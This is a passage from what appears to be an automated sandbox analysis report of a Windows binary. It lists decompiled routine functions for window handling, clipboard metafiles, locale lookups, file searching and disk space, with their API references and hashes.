					SetActiveWindow( *_t2);
					E00455280(_t45, 0);
					if( *((intOrPtr*)(_t45 + 0x44)) == 0 ||  *((char*)(_t45 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t45 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BA58( *((intOrPtr*)(_t45 + 0x44)))) == 0) {
						_t15 = _t45 + 0x30; // 0x61572065
						_t21 = E00454954( *_t15, 6, __eflags);
					} else {
						_t37 = E0044E87C( *((intOrPtr*)(_t45 + 0x44)));
						_t39 = E0044E85C( *((intOrPtr*)(_t45 + 0x44)));
						_t41 = E0043BA58( *((intOrPtr*)(_t45 + 0x44)));
						_t13 = _t45 + 0x30; // 0x61572065
						SetWindowPos( *_t13, _t41, _t39, _t37,  *( *((intOrPtr*)(_t45 + 0x44)) + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t45 + 0x30; // 0x61572065
						_t21 =  *_t14;
						_push(_t21);
						L004065DC();
					}
					if( *((short*)(_t45 + 0x142)) != 0) {
						return  *((intOrPtr*)(_t45 + 0x140))();
					}
				}
				return _t21;
			}








                                  0x00455bed
                                  0x00455bef
                                  0x00455bf3
                                  0x00455bfa
                                  0x00455c02
                                  0x00455c07
                                  0x00455c0b
                                  0x00455c14
                                  0x00455c1d
                                  0x00455c8b
                                  0x00455c8e
                                  0x00455c40
                                  0x00455c4e
                                  0x00455c57
                                  0x00455c60
                                  0x00455c66
                                  0x00455c6a
                                  0x00455c6f
                                  0x00455c71
                                  0x00455c76
                                  0x00455c7b
                                  0x00455c7b
                                  0x00455c7e
                                  0x00455c7f
                                  0x00455c7f
                                  0x00455c9b
                                  0x00000000
                                  0x00455ca5
                                  0x00455c9b
                                  0x00455cac

                                  APIs
                                  • IsIconic.USER32 ref: 00455BF3
                                  • SetActiveWindow.USER32(61572065,61572065,?,00456460), ref: 00455C0B
                                    • Part of subcall function 00455280: EnumWindows.USER32(00455210,00000000), ref: 004552AA
                                    • Part of subcall function 00455280: ShowOwnedPopups.USER32(00000000,?,00455210,00000000,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 004552D9
                                  • IsWindowEnabled.USER32(00000000), ref: 00455C37
                                  • SetWindowPos.USER32(61572065,00000000,00000000,00000000,?,00000000,00000040,00000000,61572065,61572065,?,00456460), ref: 00455C6A
                                  • NtdllDefWindowProc_A.USER32(61572065,00000112,0000F020,00000000,61572065,00000000,00000000,00000000,?,00000000,00000040,00000000,61572065,61572065,?,00456460), ref: 00455C7F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledEnumIconicNtdllOwnedPopupsProc_ShowWindows
                                  • String ID:
                                  • API String ID: 1952349125-0
                                  • Opcode ID: 68e462262d797aebf062c099a1b8a338bb464d04eee3672a2b578542fead0d97
                                  • Instruction ID: 38f412bdc4aeea992a3b34adffb2ba103466732551451dd1efc0a5d48573fe03
                                  • Opcode Fuzzy Hash: 68e462262d797aebf062c099a1b8a338bb464d04eee3672a2b578542fead0d97
                                  • Instruction Fuzzy Hash: 0F11F4706006009BDB55FF6ACDD6F6637E86F08305F0450BABE05DF297D679D8448718
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004218AC, Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004218AC(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x46fc5c; // 0x41b5e0
					E0041EB9C(_t35);
				}
				E00421048(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                                  0x004218b5
                                  0x004218be
                                  0x004218c2
                                  0x004218c4
                                  0x004218c9
                                  0x004218c9
                                  0x004218d0
                                  0x004218d5
                                  0x004218e0
                                  0x004218ed
                                  0x004218f8
                                  0x00421901
                                  0x00421904
                                  0x0042190a
                                  0x0042191a
                                  0x0042192c

                                  APIs
                                  • GetClipboardData.USER32 ref: 004218B9
                                  • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 004218DB
                                  • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 004218ED
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileMeta$ClipboardCopyDataHeader
                                  • String ID:
                                  • API String ID: 1752724394-0
                                  • Opcode ID: 2876691f48c95dc867315baa17f2a36dd0019d17157e4527e416a326f54baac6
                                  • Instruction ID: baa0d9de041a34853484338ffc7cd4c8ff110e42a940323a5d6cdd85515be475
                                  • Opcode Fuzzy Hash: 2876691f48c95dc867315baa17f2a36dd0019d17157e4527e416a326f54baac6
                                  • Instruction Fuzzy Hash: 4D117C727002048FC710DFAAC881A9ABBF8AF04310F21457EE909DB252DA75EC48CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045478C, Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045478C() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;
				void* _t17;
				void* _t20;

				 *0x470b50 = GetCurrentThreadId();
				L5:
				_t5 =  *0x470b54; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x470b40 != 0 &&  *((intOrPtr*)( *0x470b40 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E00433318( &_v12) == 0) {
							E0045729C( *0x470b40, _t17, _t20);
						}
					}
					goto L5;
				}
				return _t6;
			}








                                  0x0045479d
                                  0x004547cd
                                  0x004547cf
                                  0x004547d5
                                  0x004547df
                                  0x004547a7
                                  0x004547b5
                                  0x004547c4
                                  0x004547c8
                                  0x004547c8
                                  0x004547c4
                                  0x00000000
                                  0x004547a7
                                  0x004547e5

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00454798
                                  • GetCursorPos.USER32(?), ref: 004547B5
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 004547D5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentCursorObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 1359611202-0
                                  • Opcode ID: cd564bc254a408d91d4be8c108044f8e29921b968183628e56204ccfdc8e3892
                                  • Instruction ID: 8cd83658b4cea4d4cb8d9c267ad8d12464bc52c494f08954f8e3ebcabef4b698
                                  • Opcode Fuzzy Hash: cd564bc254a408d91d4be8c108044f8e29921b968183628e56204ccfdc8e3892
                                  • Instruction Fuzzy Hash: 90F0BE31504204DBDB10A6A5D887B4A73E8AB4971EF000677E9049F2D3EB7EAAC8C65D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043AB48, Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043AB48(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t46;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x188)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043AA98(_t37, _t46);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x46fc50; // 0x470b40
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E0044C8E0(_t37, 1);
						_t45 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00435DE4(_t45, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                                  0x0043ab4e
                                  0x0043ab51
                                  0x0043ab63
                                  0x0043abc3
                                  0x0043abd3
                                  0x0043abe2
                                  0x00000000
                                  0x0043abe9
                                  0x0043abd8
                                  0x0043abe0
                                  0x00000000
                                  0x00000000
                                  0x0043ab92
                                  0x0043ab92
                                  0x0043ab9c
                                  0x00000000
                                  0x0043ab9e
                                  0x0043aba2
                                  0x0043aba7
                                  0x0043abab
                                  0x00000000
                                  0x0043abad
                                  0x0043abba
                                  0x0043abc1
                                  0x00000000
                                  0x00000000
                                  0x0043abc1
                                  0x0043abab
                                  0x0043ab9c
                                  0x0043abf0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CaptureIconic
                                  • String ID:
                                  • API String ID: 2277910766-0
                                  • Opcode ID: b2cf1ad6e2f90d565603312f766d18725aa2497b4b1691f0b8744ad873f86363
                                  • Instruction ID: 6157f2a2bc67ed2cc0ecf365663096764261e245ee55338c55d371a54aff1bfc
                                  • Opcode Fuzzy Hash: b2cf1ad6e2f90d565603312f766d18725aa2497b4b1691f0b8744ad873f86363
                                  • Instruction Fuzzy Hash: CE11E232B002099BDB10DB58C4C4EAAF3E9AF08304F645476E500CB352DBB8FD109B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041EC2C, Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041EC2C(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x41ecc8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E0041EBD8(_t22);
				} else {
					E0040438C( &_v264, 0x100,  &_v260);
					E0040B830(_v264, 1);
					E00403B64();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x41eccf);
				return E0040411C( &_v264);
			}









                                  0x0041ec38
                                  0x0041ec40
                                  0x0041ec41
                                  0x0041ec46
                                  0x0041ec49
                                  0x0041ec51
                                  0x0041ec55
                                  0x0041ecaa
                                  0x0041ec7b
                                  0x0041ec8c
                                  0x0041ec9e
                                  0x0041eca3
                                  0x0041eca3
                                  0x0041ecb1
                                  0x0041ecb4
                                  0x0041ecb7
                                  0x0041ecc7

                                  APIs
                                  • GetLastError.KERNEL32(00000000,0041ECC8,?,00000000,?,0041ECE0,00000000,00422613,00000000,00000000,004227B3,?,00000000,00000054,?,00000000), ref: 0041EC4C
                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041ECC8,?,00000000,?,0041ECE0,00000000,00422613,00000000), ref: 0041EC72
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: c7fc891f6606528792b0f48ccbacbe00a73f583689e9eab362d1f8ca60587d33
                                  • Instruction ID: afd6d2d3d5c9c94e6f243e9b04bae9930ee68683dc30aa0030e2c1d1867d71f2
                                  • Opcode Fuzzy Hash: c7fc891f6606528792b0f48ccbacbe00a73f583689e9eab362d1f8ca60587d33
                                  • Instruction Fuzzy Hash: 9201FC742043455BE711EB678C82BD672ACE754704F50407BFE44A72C2FAB86DC0855C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408604, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00408604(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x00000016;
				_t21 = FindFirstFileA(E004045DC(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00408598(_t15);
					if(_t22 != 0) {
						E00408678(_t15);
					}
				}
				return _t22;
			}






                                  0x00408607
                                  0x00408610
                                  0x00408624
                                  0x00408626
                                  0x0040862c
                                  0x00408649
                                  0x0040862e
                                  0x00408635
                                  0x00408639
                                  0x0040863d
                                  0x0040863d
                                  0x00408639
                                  0x00408650

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 0040861F
                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 00408644
                                    • Part of subcall function 00408598: FileTimeToLocalFileTime.KERNEL32(?), ref: 004085C8
                                    • Part of subcall function 00408598: FileTimeToDosDateTime.KERNEL32 ref: 004085D7
                                    • Part of subcall function 00408678: FindClose.KERNEL32(?,?,00408642,00000000,?,?,00000000,00000000,0046C1FB,00000000,0046C3C2), ref: 00408684
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                  • String ID:
                                  • API String ID: 976985129-0
                                  • Opcode ID: e16cdd7c74d39f95b10b21f91a9d886f8b9cf60cbd8772e3331f9e28e5cf8609
                                  • Instruction ID: ff421c1de536aa3811b9a6ee9c6cc55e6393863a066716efdd391ff6a9796392
                                  • Opcode Fuzzy Hash: e16cdd7c74d39f95b10b21f91a9d886f8b9cf60cbd8772e3331f9e28e5cf8609
                                  • Instruction Fuzzy Hash: 32E0A072A0112017C714AAAD9D8155F51C84A85378306167FB945FB283DD38CC1283D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408862, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00408862(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E00404EF0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E00404EF0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                  0x0040886b
                                  0x00408870
                                  0x00408872
                                  0x00408872
                                  0x00408885
                                  0x00408894
                                  0x00408897
                                  0x004088a4
                                  0x004088a7
                                  0x004088ac
                                  0x004088af
                                  0x004088b1
                                  0x004088be
                                  0x004088c1
                                  0x004088c6
                                  0x004088c9
                                  0x004088cb
                                  0x004088d4

                                  APIs
                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408885
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: DiskFreeSpace
                                  • String ID:
                                  • API String ID: 1705453755-0
                                  • Opcode ID: e0f5f6d17ac78af4b02de4df6a086a2a3e69240104d60bac68db34341ef77bc2
                                  • Instruction ID: 7e4b8752b078cf5247d4ecb0c82ace8a0af0dac2d7f8e56e8aaaba7ec49f0b69
                                  • Opcode Fuzzy Hash: e0f5f6d17ac78af4b02de4df6a086a2a3e69240104d60bac68db34341ef77bc2
                                  • Instruction Fuzzy Hash: A71100B5A00209AFDB04CF99C881DAFB7F9FFC8304B14C569A509E7251E6319E018BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405CCE, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00405CCE(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x405d36);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E0040438C( &_v20, 7,  &_v15);
				E00402DE8(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00405D3D);
				return E0040411C( &_v20);
			}








                                  0x00405cd9
                                  0x00405cde
                                  0x00405cdf
                                  0x00405ce4
                                  0x00405ce7
                                  0x00405cf6
                                  0x00405d06
                                  0x00405d11
                                  0x00405d1c
                                  0x00405d1c
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d35

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: ea2610eff1eca33162b1406312ad9ed308ccfb9553fe294e29c75d28227dac15
                                  • Instruction ID: 7f68ee31be462983b6b581755d2b664830700bcaa6991b8e869a7ba904a132b5
                                  • Opcode Fuzzy Hash: ea2610eff1eca33162b1406312ad9ed308ccfb9553fe294e29c75d28227dac15
                                  • Instruction Fuzzy Hash: ADF0A930A04709AFE714EEA1CC46AEEB376EBC5714F40887BA510B71D0E6782A04CA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405CD0, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00405CD0(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x405d36);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E0040438C( &_v20, 7,  &_v15);
				E00402DE8(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00405D3D);
				return E0040411C( &_v20);
			}








                                  0x00405cd9
                                  0x00405cde
                                  0x00405cdf
                                  0x00405ce4
                                  0x00405ce7
                                  0x00405cf6
                                  0x00405d06
                                  0x00405d11
                                  0x00405d1c
                                  0x00405d1c
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d35

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405D36), ref: 00405CF6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 7035f4c54bbb58942f31f3259e6e8a0099fd8ccb2a83d2b8b1e7a2b0306c6af0
                                  • Instruction ID: 2ee38d1922a8d6628af9f96e7d88a8de41702a51ef3945bdfdcedc6e5521318e
                                  • Opcode Fuzzy Hash: 7035f4c54bbb58942f31f3259e6e8a0099fd8ccb2a83d2b8b1e7a2b0306c6af0
                                  • Instruction Fuzzy Hash: 6DF0CD30904709AFE714EF91CC46AEEB376FBC5714F40887BA510771D0E7782A04CA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B068, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B068(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404170(_t10, _t18);
				}
				return E0040420C(_t10, _t5 - 1,  &_v260);
			}






                                  0x0040b073
                                  0x0040b075
                                  0x0040b08d
                                  0x00000000
                                  0x0040b0a5
                                  0x00000000

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: f4d49c88b2b623f0fe3eaed7e9b0acce4e93916ae7e8fcb20e38ee687be1632f
                                  • Instruction ID: c691e71b8d0f6d085652890316cdc29bc24c20f07b1cdb32de9599e2e27a24df
                                  • Opcode Fuzzy Hash: f4d49c88b2b623f0fe3eaed7e9b0acce4e93916ae7e8fcb20e38ee687be1632f
                                  • Instruction Fuzzy Hash: 7EE0927171021416D315A5595C869E7729CD798310F0042BFBE15E73C2EEB99D8042ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B0B4, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040B0B4(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}






                                  0x0040b0b7
                                  0x0040b0b8
                                  0x0040b0ce
                                  0x0040b0d6
                                  0x0040b0d0
                                  0x0040b0d0
                                  0x0040b0d0
                                  0x0040b0dc

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040C82E,00000000,0040CA47,?,?,00000000,00000000), ref: 0040B0C7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: c21801bdc333d7a8c847a4a423d6a81d23b251c1c785f1e98f1b88fec7770ac0
                                  • Instruction ID: 82c7e0c176c39547d5d33f7f4f80d15a263d45c03e77ac78b6eae8b631033410
                                  • Opcode Fuzzy Hash: c21801bdc333d7a8c847a4a423d6a81d23b251c1c785f1e98f1b88fec7770ac0
                                  • Instruction Fuzzy Hash: FCD05E6230D2642AE210615B2D85D7BAADCCBC67A1F10807FB658D6282D2258C0693B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409B44, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409B44() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                  0x00409b48
                                  0x00409b54

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID:
                                  • API String ID: 481472006-0
                                  • Opcode ID: 1ce6753cc2ea13f5e91634e1fbfe1eea770abd53abc073e18ea36a898be9a820
                                  • Instruction ID: 0e8f06d997aabaabdb70fbd4158b2c6bca8ec53de24db574045d7edb098f9dcd
                                  • Opcode Fuzzy Hash: 1ce6753cc2ea13f5e91634e1fbfe1eea770abd53abc073e18ea36a898be9a820
